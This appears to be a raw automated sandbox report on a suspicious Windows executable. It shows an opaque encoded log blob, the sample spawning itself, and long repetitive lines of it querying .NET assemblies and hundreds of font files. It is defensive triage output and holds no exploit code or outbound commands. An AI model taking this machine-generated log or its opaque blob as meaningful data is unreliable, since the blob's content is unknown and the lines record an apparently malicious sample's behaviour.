UNARCH~1.LOGunarchiver.exe.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
Source: file.exe, 00000003.00000002.662735362.000000000E566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040351E GetProcessHeap,RtlFreeHeap,3_2_0040351E
Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
